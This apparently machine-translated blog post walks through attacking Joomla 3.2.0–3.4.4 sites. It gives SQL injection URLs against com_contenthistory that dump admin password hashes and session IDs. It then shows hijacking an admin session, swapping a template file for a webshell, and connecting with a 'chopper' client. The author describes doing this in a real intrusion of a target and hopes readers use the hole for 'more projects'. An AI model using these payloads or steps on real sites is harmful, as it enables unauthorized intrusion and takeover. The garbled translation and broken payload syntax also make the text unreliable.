Using Joomla 3.2.0–3.4.4 to inject holes into Getshell

This would have been a apt project, so the details are inconvenient to specifically disclose, involving sensitive things, I use the local test environment instead.

Before infiltration, the target station is most of Joomla's CMS, then gave up, the recent Joomla SQL injection loophole Let me rekindle the hope, and then find all Joomla, according to the background of the look, probably judged version, and then found two sub-station problems.

Test burst administrator password. Statement as follows:

Http://10.211.55.3/joomla/index.php?option=com_contenthistory&view=history&list[ordering]
=& item_id=1&type_id=1&list[select]= (select 1 from (SELECT COUNT (*), concat (SELECT) (select Co
ncat (password ) from%23__users limit 0,1), floor (rand (0) *2)) x to Information_schema.tables 
Group by X)

Then burst the password (the current site has fixed the vulnerability, so the following screenshot is a local test picture.) ）

Get encrypted password, however, the actual infiltration, I get the password, the fundamental solution is not open. This method is useless, but the article also gives a burst session statement as follows:

/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&li
st[select]= (select 1=updatexml (1,concat (0x5e24, select session_id from Jml_session limit 
), 0,1), 1)

Here you need to modify the prefix of the data table. However, this burst of session does not necessarily log in the background:

After refreshing, still unable to log in.

Here at that time Todaro cow to change a statement, the condition changed to where username = ' admin ' such, but this is not the result. Full statement:

/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&li
st[select]=  (Select 1=updatexml 1,concat (0x5e24, select session_id from test_session where 
username= ' admin ' limit 0,1), 0x5e24 ), 1)

This statement at that time I test unsuccessful, and now the local experiment can be successful, we can try, when not successful, I think the local environment only userid This value is very strange. So, change the statement

/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&li
st[select]=  (Select 1=updatexml (1,concat (0x5e24, select session_id from test_session where userid!=0 limit 
), 0,1), 1)

At that time, there is a demo user session value, also can not log in. Later, after a few days, the administrator of a landing, I quickly record the session, landed backstage.

Refresh and go backstage.

Go backstage, then it's Getshell. Because the Getshell is by modifying the template to Getshell, so be quick, or be found on the bad. Background select Extensions--templates, as shown in figure:

Access to this page

Then select the templates on the left and enter the page.

Select a template to modify, such as the first, click on the title can be. After entering, select the left index.php (here casually) and then back up the good content.

Empty the content, change to Webshell, and then Save&close.

Then click Close and return to the Select Template page, clicking left style to enter the page.

Use the following stars to set the modified template as the default value.

Then, use the chopper directly to connect

Successfully get the shell authority, the actual infiltration of a lot of information inconvenient to disclose, but also please forgive me. I hope that we can use this hole to do more projects. Finally, thanks again for the support and help given by Todaro.